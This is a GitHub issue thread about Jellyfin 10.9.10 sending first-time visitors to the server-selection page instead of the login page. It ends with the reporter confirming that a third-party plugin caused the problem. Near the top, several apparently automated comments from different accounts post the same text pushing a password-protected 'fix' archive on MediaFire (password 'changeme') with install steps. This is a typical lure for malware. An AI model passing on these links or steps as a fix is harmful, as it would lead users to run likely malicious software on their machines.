### ISSUE TITLE
Opening the Jellyfin URL for the first time on 10.9.10 redirects to the /selectserver.html page instead of the instance

### ISSUE THREAD

**Issue by alvitali** [jellyfin/jellyfin#12523]
### This issue respects the following points:

- [X] This is a **bug**, not a question or a configuration issue; Please visit our forum or chat rooms first to troubleshoot with volunteers, before creating a report. The links can be found [here](https://jellyfin.org/contact/).
- [X] This issue is **not** already reported on [GitHub](https://github.com/jellyfin/jellyfin/issues?q=is%3Aopen+is%3Aissue) _(I've searched it)_.
- [X] I'm using an up to date version of Jellyfin Server stable, unstable or master; We generally do not support previous older versions. If possible, please update to the latest version before opening an issue.
- [X] I agree to follow Jellyfin's [Code of Conduct](https://jellyfin.org/docs/general/community-standards.html#code-of-conduct).
- [X] This report addresses only a single issue; If you encounter multiple issues, kindly create separate reports for each one.

### Description of the bug

When a user opens the Jellyfin URL in 10.9.10 (using IP:port or jellyfin.domain.tld) in a browser for the first time, it always redirects to /web/#/selectserver.html instead of the login page. The context given is "No servers have been found using the automatic server discovery." with the option to "Add Server" by inputting the URL, which then redirects to the instance just fine. Once the user has added the server manually, it always loads the instance just fine.

### Reproduction steps

1. Open the URL (IP or domain) of a Jellyfin instance running 10.9.10 in a private browser tab, or on a newly installed browser
2. It defaults to the "Select Server" page

### What is the current _bug_ behavior?

Jellyfin redirects the user to the "Select Server" page instead of the login page with the same URL

### What is the expected _correct_ behavior?

Jellyfin should directly load the login page of the instance with the corresponding URL

### Jellyfin Server version

10.9.9+

### Specify the build version

10.9.10

### Environment

```markdown
- OS:Debian 12
- Linux Kernel: 6.1.0-23-amd64
- Virtualization: Docker
- Clients: Browser (macOS & Windows)
- Browser: Safari, Edge, Firefox
- FFmpeg Version:
- Playback Method:
- Hardware Acceleration:
- GPU Model:
- Plugins:
- Reverse Proxy: Traefik v3.1
- Base URL: 192.168.1.x:8096, https://jellyfin.domain.tld
- Networking: Bridge
- Storage: NFS
```

### Jellyfin logs

```shell
Couldn't discern relevant logs for behaviour
```

**Comment by huangzhaor** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by AnaSousa314** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by uno-zero** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by deverchettychandrashekar** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by masooddahmedd** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by uno-zero** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by tianshiyan1314** [comment]
the same to you

**Comment by alvitali** [comment]
Just reverted back to Jellyfin v10.9.9, where the issue is not present. Loading the Jellyfin URL for the first time correctly redirects to the login page

**Comment by hundredfire** [comment]
Can confirm had the same issue when trying to reinstall my jellyfin container on docker

**Comment by hundredfire** [comment]
Quick update: clearing browser cache fixed it for me. Even on 10.9.10

**Comment by alvitali** [comment]
> Quick update: clearing browser cache fixed it for me. Even on 10.9.10

After previously having logged in? Because I opened it on a new browser, on a new device (that's how I discovered the issue), and encountered this. Having this be an issue when opening the URL in an "Incognito" tab, in multiple browsers (including Firefox), makes it hard to believe it was an issue with the cache, on 10.9.10 anyways

**Comment by hundredfire** [comment]
Yes, I was previously logged in on this browser. Then nuked my jellyfin by wiping the config folder. Reinstalled 10.9.10 using docker compose, and ended up on the server selection page, asking me to log in (NOT create a new user, but the login portal). Of course it didn't work, because it was a brand new installation.
So, I used a chrome extension to clear the cache specifically for my jellyfin webpage. The extension is named "Clear cache" and I enabled clearing cache, local cache, cache storage and cookies. 
Refreshed the page and I ended up on the new installation wizard/page

P.S: I didn't vet this extension and don't know how safe it is. Use at your own risk

**Comment by felix920506** [comment]
closing this as it is fixed by clearing browser cache, which is one of the actions we instruct users to do when having issues.

**Comment by alvitali** [comment]
> closing this as it is fixed by clearing browser cache, which is one of the actions we instruct users to do when having issues.

I disagree, as I've still got this issue. Never mind browser cache - I'm experiencing this issue ONLY on fresh browser installs / after clearing the cache; and opening Jellyfin's URL. As I'm also experiencing this when loading Jellyfin through IP_address:port, I'm pretty sure it's not an issue with the setup of my reverse proxy or similar.

Again, I'm experiencing this issue only on 10.9.10, works as expected on 10.9.9. Just upgraded to 10.9.10 once again to make sure.

**Comment by xiNeRoar** [comment]
> > closing this as it is fixed by clearing browser cache, which is one of the actions we instruct users to do when having issues.
> 
> I disagree, as I've still got this issue. Never mind browser cache - I'm experiencing this issue ONLY when opening Jellyfin's URL on fresh browser installs / after clearing the cache. As I'm also experiencing this when loading Jellyfin through IP_address:port, I'm pretty sure it's not an issue with the setup of my reverse proxy.
> 
> Again, I'm experiencing this issue only on 10.9.10, works as expected on 10.9.9. Just upgraded to 10.9.10 once again to make sure.

I have the same issue, no matter how many time i clear the cache, it still present me with a loading page, if i use a different browser which never enter the jellyfin link before, it will redirect me to the /selectserver.html page instead

**Comment by gnattu** [comment]
I cannot reproduce this, need more info on how to reproduce this behavior.

**Comment by loof2736** [comment]
@alvitali @xiNeRoar Do you have any plugins installed? Another user seemed to think this was being caused by the "InPlayerEpisodePreview" here: https://github.com/Namo2/InPlayerEpisodePreview/issues/27

**Comment by xiNeRoar** [comment]
> @alvitali @xiNeRoar Do you have any plugins installed? Another user seemed to think this was being caused by the "InPlayerEpisodePreview" here: [Namo2/InPlayerEpisodePreview#27](https://github.com/Namo2/InPlayerEpisodePreview/issues/27)

Yes, I just figure out when the issue was caused by this plugin. Everything works fine right after I uninstall this plugin

**Comment by gnattu** [comment]
Well I have to say that plugins that attempts to modify the original web pages are not recommended and all bugs caused by its behavior to modify the server web code will not be supported and should be fixed on the plugin side. Now waiting for OP's response to see if this is indeed caused by this plugin.

**Comment by alvitali** [comment]
@gnattu I can confirm this was indeed caused by the "InPlayerEpisodePreview" plugin mentioned. I'm sorry for holding you all up on this issue unrelated to Jellyfin itself.

@loof2736 Thank you so much for making the connection! Didn't remotely think of that possibility, as I had the plugin installed a while before updating to 10.9.10, without issues...

Closing this issue happily running 10.9.10 now :D
